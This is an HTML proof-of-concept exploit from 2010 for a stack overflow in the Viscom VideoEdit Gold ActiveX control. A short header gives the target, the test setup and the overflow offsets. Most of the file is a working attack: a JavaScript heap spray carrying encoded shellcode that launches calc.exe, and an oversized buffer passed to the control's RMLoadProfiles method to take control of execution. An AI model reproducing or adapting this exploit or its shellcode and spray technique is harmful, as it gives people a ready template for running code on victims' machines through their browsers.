<!-- Title: Viscom VideoEdit Gold ActiveX 8.0 Remote Code Execution Exploit Date: Dec 5, 2010 Author: Rew Email: rew [splat] leethax.info Link: http://www.viscomsoft.com/products/videoeditgold/index.html Version: 8.0.0.0 Tested on: WinXP - IE 6 CVE: NA (0day) Impact is relatively low due to object not marked safe for scripting. You'll need to change the default IE settings to let it run. This is a plain vanilla stack overflow. The file is... "%PROGRAMFILES%\VideoEdit Gold ActiveX Control\VideoEdit.ocx" I'm not using the SEH but here's the offsets just for kicks if you're interested. [2311 junk] [ebp] [eip] [284 junk] [nseh] [seh] --> <object classid='clsid:57D9AF4C-23BA-47EC-A40B-2DA79641B285' id='target' /></object> <script> // Ctrl+C Ctrl+V, herpderp // calc.exe var shellcode = unescape( '%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+ '%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+ '%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+ '%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+ '%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+ '%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+ '%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+ '%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e' ); var nops = unescape('%u9090%u9090'); var headersize = 20; var slackspace = headersize + shellcode.length; while(nops.length < slackspace) { nops += nops; } var fillblock = nops.substring(0, slackspace); var block = nops.substring(0, nops.length - slackspace); while((block.length + slackspace) < 0x50000) { block = block + block + fillblock; } memory=new Array(); for(counter=0; counter<200; counter++){ memory[counter] = block + shellcode; } var bof = ''; while(bof.length < 2312){ bof += 'A'; } bof += 'BBBB'; // EBP bof += "\x0c\x0c\x0c\x0c"; // EIP document.getElementById('target').RMLoadProfiles( bof ); </script>